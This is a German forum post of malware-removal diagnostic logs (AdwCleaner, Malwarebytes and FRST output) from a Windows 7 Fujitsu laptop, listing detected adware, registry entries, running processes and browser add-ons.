[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\741B4ADF27276464790022C965AB6DA8
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7DE196B10195F5647A2B21B761F3DE01
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9D4F5849367142E4685ED8C25E44C5ED
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A5875B04372C19545BEB90D4D606C472
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A71991503412AEB42838B02C5ED9F9CD
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A876D9E80B896EC44A8620248CC79296
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B66FFAB725B92594C986DE826A867888
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F2E0D3DD9E5E4B74CA43BCE77815E287
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F7652513C62FF63448CFF05163719DB7
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\120DFADEB50841F408F04D2A278F9509
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\18C9E3869A16248439FE3FF9EB02207A
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5D8011310B2622942868A458964FFDC5
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6C63F7979DCC2154CB9591969A5CB89D
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6DD31E6C1A73B334383DF186676F4D20
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\AB3204F747B20694B8D49EF92D8DC94B
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C81E33A400B6F814E90C7A3354E2A3A5
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\EDBF68C5F16790341B7C6FD7C7F8E4FC
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FFA531D0F3A71504DA7AC6A11CE33739
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3038A20B9089EC34D8F74220191FAB30
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B5BAE2ED018083A4C8DA86D6E3F4B024
[#] Schlüssel mit Neustart gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\A28B4D68DEBAA244EB686953B7074FEF
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\F928123A039649549966D4C29D35B1C9
[#] Schlüssel mit Neustart gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\F928123A039649549966d4C29D35B1C9
[-] Daten  wiederhergestellt: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\Software\Microsoft\Internet Explorer\Main [Search Page] 
[-] Daten  wiederhergestellt: HKCU\Software\Microsoft\Internet Explorer\Main [Search Page] 
[-] Daten  wiederhergestellt: [x64] HKCU\Software\Microsoft\Internet Explorer\Main [Search Page] 
[-] Schlüssel gelöscht: HKLM\SOFTWARE\CLASSES\APPID\56BF5154-0B48-4ADB-902A-6C8B12E270D9
[-] Schlüssel gelöscht: HKLM\SYSTEM\CurrentControlSet\Control\Power\User\PowerSchemes\e24b7131-d039-43cb-9e6f-ad4be601ec1f
[-] Schlüssel gelöscht: HKLM\SYSTEM\CurrentControlSet\Control\Power\User\PowerSchemes\04262113-2a31-48e1-b4bb-3b42174bea0f
[-] Schlüssel gelöscht: HKLM\SYSTEM\ControlSet002\Control\Power\User\PowerSchemes\e24b7131-d039-43cb-9e6f-ad4be601ec1f
[-] Schlüssel gelöscht: HKLM\SYSTEM\ControlSet002\Control\Power\User\PowerSchemes\04262113-2a31-48e1-b4bb-3b42174bea0f
[#] Schlüssel mit Neustart gelöscht: HKLM\SYSTEM\ControlSet001\Control\Power\User\PowerSchemes\e24b7131-d039-43cb-9e6f-ad4be601ec1f
[#] Schlüssel mit Neustart gelöscht: HKLM\SYSTEM\ControlSet001\Control\Power\User\PowerSchemes\04262113-2a31-48e1-b4bb-3b42174bea0f
[-] Wert gelöscht: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost [WinSAPSvc]
[-] Wert gelöscht: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost [Kitty]
[-] Wert gelöscht: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost [BIT]


***** [ Browser ] *****



*************************

:: "Tracing" Schlüssel gelöscht
:: Winsock Einstellungen zurückgesetzt
:: "Prefetch" Dateien gelöscht
:: Proxy Einstellungen zurückgesetzt
:: Internet Explorer Richtlinien gelöscht
:: Chrome Richtlinien gelöscht

*************************

C:\AdwCleaner\AdwCleaner[C0].txt - [10362 Bytes] - [21/05/2017 19:45:13]
C:\AdwCleaner\AdwCleaner[S0].txt - [10396 Bytes] - [21/05/2017 19:36:55]

########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [10510 Bytes] ##########

--- --- ---

Schritt 2: mbam.txt:

Malwarebytes
www.malwarebytes.com

-Protokolldetails-
Scan-Datum: 22.05.17
Scan-Zeit: 17:37
Protokolldatei: 22 Mai.txt
Administrator: Ja

-Softwaredaten-
Version: 3.1.2.1733
Komponentenversion: 1.0.122
Version des Aktualisierungspakets: 1.0.1994
Lizenz: Testversion

-Systemdaten-
Betriebssystem: Windows 7 Service Pack 1
CPU: x64
Dateisystem: NTFS
Benutzer: Markus-PC\Markus

-Scan-Übersicht-
Scan-Typ: Bedrohungs-Scan
Ergebnis: Abgeschlossen
Gescannte Objekte: 363638
Erkannte Bedrohungen: 11
In die Quarantäne verschobene Bedrohungen: 11
Abgelaufene Zeit: 1 Min., 52 Sek.

-Scan-Optionen-
Speicher: Aktiviert
Start: Aktiviert
Dateisystem: Aktiviert
Archive: Aktiviert
Rootkits: Deaktiviert
Heuristik: Aktiviert
PUP: Aktiviert
PUM: Aktiviert

-Scan-Details-
Prozess: 0
(keine bösartigen Elemente erkannt)

Modul: 0
(keine bösartigen Elemente erkannt)

Registrierungsschlüssel: 4
PUP.Optional.PCSpeedUp, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\PCSUUCDRV, In Quarantäne, [6863], [241622],1.0.1994
Adware.Elex, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{5CBA789E-743C-4F3C-BBB6-889D39EDF9BC}, In Quarantäne, [2], [400540],1.0.1994
Adware.Elex, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Jujalyclartion Launcher, In Quarantäne, [2], [400541],1.0.1994
PUP.Optional.OpenCandy, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\OpenCandyHelperRunOnce83110C5A7FFA496FAFAB0C9153FF1483, In Quarantäne, [509], [241417],1.0.1994

Registrierungswert: 3
Adware.Elex, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\FIREWALLRULES|{7CB36E57-5C15-40DA-B8BD-CA7ABFFAEE9C}, In Quarantäne, [2], [400537],1.0.1994
Adware.Elex, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\FIREWALLRULES|{D2776C81-FAD8-4999-BFA5-7FDA506FBE9A}, In Quarantäne, [2], [400537],1.0.1994
Adware.Elex, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{5CBA789E-743C-4F3C-BBB6-889D39EDF9BC}|PATH, In Quarantäne, [2], [400540],1.0.1994

Registrierungsdaten: 2
PUP.Optional.Qone8, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES|DEFAULTSCOPE, Ersetzt, [14135], [292819],1.0.1994
PUP.Optional.Qone8, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES|DEFAULTSCOPE, Ersetzt, [14135], [292819],1.0.1994

Daten-Stream: 0
(keine bösartigen Elemente erkannt)

Ordner: 0
(keine bösartigen Elemente erkannt)

Datei: 2
PUP.Optional.ASK, C:\WINDOWS\INSTALLER\44769.MSI, In Quarantäne, [510], [113867],1.0.1994
Adware.Elex, C:\WINDOWS\SYSTEM32\TASKS\JUJALYCLARTION LAUNCHER, In Quarantäne, [2], [400542],1.0.1994

Physischer Sektor: 0
(keine bösartigen Elemente erkannt)

(end)

Schritt 3:
FRST:

FRST Logfile:

Code:

ATTFilter

Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 22-05-2017
durchgeführt von Markus (Administrator) auf MARKUS-PC (22-05-2017 20:57:13)
Gestartet von C:\FRST\FRST-OlderVersion
Geladene Profile: Markus (Verfügbare Profile: Markus)
Platform: Windows 7 Professional Service Pack 1 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: "C:\Program Files (x86)\Firefox\Firefox.exe" -osint -url "%1")
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

========================================================

C:\FRST\FRST64.exe => Win32/Suweezy? - erfolgreich verschoben

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
() C:\Program Files (x86)\Lexware\AAVUpdateManager\aavus.exe
() C:\Program Files\Avira Secure Backup\Avira Secure BackupCrawler.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
(DTS, Inc) C:\Program Files\Realtek\Audio\HDA\DTSU2PAuSrv64.exe
(Intel(R) Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(FUJITSU LIMITED) C:\Program Files\Fujitsu\FUJ02E3\FUJ02E3.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(Hewlett-Packard Company) C:\Program Files (x86)\HP\HPBDSService\HPBDSService.exe
(HP) C:\Program Files (x86)\HP\HPLaserJetService\HPLaserJetService.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(pdfforge GmbH) C:\Program Files (x86)\PDF Architect\HelperService.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(pdfforge GmbH) C:\Program Files (x86)\PDF Architect\ConversionService.exe
(FUJITSU LIMITED) C:\Program Files\Fujitsu\FUJ02E3\FUJ02E3.exe
(FUJITSU LIMITED) C:\Program Files\Fujitsu\Plugfree NETWORK\PFNService.exe
(FUJITSU LIMITED) C:\Program Files\Fujitsu\PSUtility\TrayManager.exe
(FUJITSU LIMITED) C:\Program Files\Fujitsu\Application Panel\QuickTouch.exe
(FUJITSU LIMITED) C:\Program Files\Fujitsu\PSUtility\PSUService.exe
(Intel(R) Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(FUJITSU LIMITED) C:\Program Files\Fujitsu\Application Panel\BtnHnd.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Hewlett-Packard Company) C:\Program Files (x86)\HP\Digital Imaging\Fax\Fax Driver 0.6 Base\hppfaxprintersrv.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Malwarebytes) C:\Program Files\Malwarebytes\MBAMService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(Malwarebytes) C:\Program Files\Malwarebytes\mbamtray.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(FUJITSU LIMITED) C:\Program Files (x86)\Fujitsu\Fujitsu Hotkey Utility\IndicatorUty.exe
(Fujitsu Technology Solutions) C:\Fujitsu\Programs\DeskUpdate\DeskUpdateNotifier.exe
(shbox.de) C:\Program Files (x86)\FreePDF_XP\fpassist.exe
(Hewlett-Packard Company) C:\Program Files (x86)\HP\StatusAlerts\bin\HPStatusAlerts.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTStackServer.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\Bluetooth Headset Helper.exe
(FUJITSU LIMITED) C:\Program Files\Fujitsu\Plugfree NETWORK\PFNAutoCon.exe
(PortableApps.com) F:\Firefox Plus\FirefoxPortable.exe
(Mozilla Corporation) F:\Firefox Plus\App\Firefox\firefox.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(FUJITSU LIMITED) C:\Program Files\Fujitsu\Plugfree NETWORK\PFNetDm.exe
(FUJITSU LIMITED) C:\Program Files\Fujitsu\Plugfree NETWORK\PFNTray.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Nero AG) C:\Program Files (x86)\Nero\Update\NASvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\SysWOW64\SearchProtocolHost.exe

==================== Registry (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13374568 2011-12-13] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_DTS] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2277992 2011-11-15] (Realtek Semiconductor)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2816808 2011-08-11] (Synaptics Incorporated)
HKLM\...\Run: [LoadFUJ02E3] => C:\Program Files\Fujitsu\FUJ02E3\fuj02e3.exe [76104 2011-11-24] (FUJITSU LIMITED)
HKLM\...\Run: [PSUTility] => C:\Program Files\Fujitsu\PSUtility\TrayManager.exe [205168 2011-10-03] (FUJITSU LIMITED)
HKLM\...\Run: [LoadFujitsuQuickTouch] => C:\Program Files\Fujitsu\Application Panel\QuickTouch.exe [158024 2011-10-01] (FUJITSU LIMITED)
HKLM\...\Run: [LoadBtnHnd] => C:\Program Files\Fujitsu\Application Panel\BtnHnd.exe [23368 2011-10-01] (FUJITSU LIMITED)
HKLM\...\Run: [HP LaserJet 200 color MFP M276 Series Fax] => C:\Program Files (x86)\HP\Digital Imaging\Fax\Fax Driver 0.6 Base\hppfaxprintersrv.exe [3706424 2011-10-09] (Hewlett-Packard Company)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2787264 2016-01-12] (NVIDIA Corporation)
HKLM\...\Run: [emsisoft anti-malware] => "c:\program files\emsisoft anti-malware\a2guard.exe" /d=60
HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\mbamtray.exe [3146704 2017-05-09] (Malwarebytes)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [291608 2012-01-17] (Intel Corporation)
HKLM-x32\...\Run: [IndicatorUtility] => C:\Program Files (x86)\Fujitsu\Fujitsu Hotkey Utility\IndicatorUty.exe [48752 2010-09-30] (FUJITSU LIMITED)
HKLM-x32\...\Run: [DeskUpdateNotifier] => c:\Fujitsu\Programs\DeskUpdate\DeskUpdateNotifier.exe [101144 2015-06-15] (Fujitsu Technology Solutions)
HKLM-x32\...\Run: [YouCam Service] => "C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe" /s
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)
HKLM-x32\...\Run: [FreePDF Assistant] => C:\Program Files (x86)\FreePDF_XP\fpassist.exe [371200 2011-02-23] (shbox.de)
HKLM-x32\...\Run: [StatusAlerts] => C:\Program Files (x86)\HP\StatusAlerts\bin\HPStatusAlerts.exe [313248 2012-07-18] (Hewlett-Packard Company)
HKLM-x32\...\Run: [FUJ02B1_Apps] => C:\Program Files (x86)\Fujitsu\FUJ02B1\CheckBatteryPack.exe [367424 2016-05-11] (FUJITSU LIMITED)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\Run: [SpybotPostWindows10UpgradeReInstall] => "C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe"
HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [27219928 2016-11-15] (Skype Technologies S.A.)
HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\MountPoints2: {c5240729-fc2c-11e3-b801-c01885aadbce} - F:\DTVP_Launcher.exe
HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\MountPoints2: {fd17f95e-28b3-11e2-b434-806e6f6e6963} - D:\wubi.exe
AppInit_DLLs: C:\Windows\system32\nvinitx.dll => C:\Windows\system32\nvinitx.dll [175368 2016-02-09] (NVIDIA Corporation)
AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [153208 2016-02-09] (NVIDIA Corporation)
Lsa: [Notification Packages] scecli C:\Program Files\WIDCOMM\Bluetooth Software\BtwProximityCP.dll
ShellIconOverlayIdentifiers: [MemopalBackedUp] -> {8ED3CC2D-6BC2-43AD-8C43-F51FBB413AE6} => C:\Program Files\Avira Secure Backup\ShellExtensionx64\ShellExtension.dll [2013-11-06] ()
ShellIconOverlayIdentifiers: [MemopalError] -> {B9CA6E12-7975-4997-B5BD-CA12ECE0FEAD} => C:\Program Files\Avira Secure Backup\ShellExtensionx64\ShellExtension.dll [2013-11-06] ()
ShellIconOverlayIdentifiers: [MemopalPartiallyBackedUp] -> {95DDC869-FC98-4D47-BD34-2EDC9AA09C01} => C:\Program Files\Avira Secure Backup\ShellExtensionx64\ShellExtension.dll [2013-11-06] ()
ShellIconOverlayIdentifiers: [MemopalToBackup] -> {2CDD871E-60EB-40BD-9721-A1CB57042F75} => C:\Program Files\Avira Secure Backup\ShellExtensionx64\ShellExtension.dll [2013-11-06] ()
ShellIconOverlayIdentifiers-x32: [MemopalBackedUp] -> {8ED3CC2D-6BC2-43AD-8C43-F51FBB413AE6} => C:\Program Files\Avira Secure Backup\ShellExtension\ShellExtension.dll [2013-11-06] ()
ShellIconOverlayIdentifiers-x32: [MemopalError] -> {B9CA6E12-7975-4997-B5BD-CA12ECE0FEAD} => C:\Program Files\Avira Secure Backup\ShellExtension\ShellExtension.dll [2013-11-06] ()
ShellIconOverlayIdentifiers-x32: [MemopalPartiallyBackedUp] -> {95DDC869-FC98-4D47-BD34-2EDC9AA09C01} => C:\Program Files\Avira Secure Backup\ShellExtension\ShellExtension.dll [2013-11-06] ()
ShellIconOverlayIdentifiers-x32: [MemopalToBackup] -> {2CDD871E-60EB-40BD-9721-A1CB57042F75} => C:\Program Files\Avira Secure Backup\ShellExtension\ShellExtension.dll [2013-11-06] ()
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk [2012-01-26]
ShortcutTarget: Bluetooth.lnk -> C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (Broadcom Corporation.)
Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LaunchCenter.lnk [2012-01-27]
ShortcutTarget: LaunchCenter.lnk -> C:\Program Files\Fujitsu\LaunchCenter\lcStarter.exe (Fujitsu Technology Solutions)
Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LaunchCenter.lnk [2012-01-27]
ShortcutTarget: LaunchCenter.lnk -> C:\Program Files\Fujitsu\LaunchCenter\lcStarter.exe (Fujitsu Technology Solutions)
BootExecute: autocheck autochk * sdnclean64.exe

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Hosts: 0.0.0.1	mssplus.mcafee.com
Tcpip\Parameters: [DhcpNameServer] 192.168.179.1
Tcpip\..\Interfaces\{1EDD786C-676B-4E94-B44B-9E94A619AFFB}: [DhcpNameServer] 192.168.179.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxps://search.avira.net/#/?show_is=1&source=art
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-3526156030-524322557-4044303751-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-3526156030-524322557-4044303751-1001 -> {C01A2B73-D42B-46F8-AFF0-E5207570AE93} URL = 
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2010-09-22] (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: PDF Architect Helper -> {3A2D5EBA-F86D-4BD3-A177-019765996711} -> C:\Program Files (x86)\PDF Architect\PDFIEHelper.dll [2013-04-08] (pdfforge GmbH)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2010-09-22] (Microsoft Corp.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
Toolbar: HKU\S-1-5-21-3526156030-524322557-4044303751-1001 -> Kein Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  Keine Datei
Toolbar: HKU\S-1-5-21-3526156030-524322557-4044303751-1001 -> Kein Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  Keine Datei
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2016-09-23] (Skype Technologies)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF DefaultProfile: tuoa89rc.default
FF ProfilePath: C:\Users\Markus\AppData\Roaming\Mozilla\Firefox\Profiles\tuoa89rc.default [2017-05-22]
FF Homepage: Mozilla\Firefox\Profiles\tuoa89rc.default -> rp-online.
FF HKLM-x32\...\Firefox\Extensions: [FFPDFArchitectConverter@pdfarchitect.com] - C:\Program Files (x86)\PDF Architect\FFPDFArchitectExt
FF Extension: (PDF Architect Converter For Firefox) - C:\Program Files (x86)\PDF Architect\FFPDFArchitectExt [2017-04-27] [ist nicht signiert]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_25_0_0_171.dll [2017-05-13] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [Keine Datei]
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_171.dll [2017-05-13] ()
FF Plugin-x32: @canon.com/MycameraPlugin -> C:\Program Files (x86)\Canon\MyCamera Download Plugin\NPCIG.dll [2008-10-15] (CANON INC.)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.0.52 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2011-12-01] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2011-12-01] (Intel Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [Keine Datei]
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
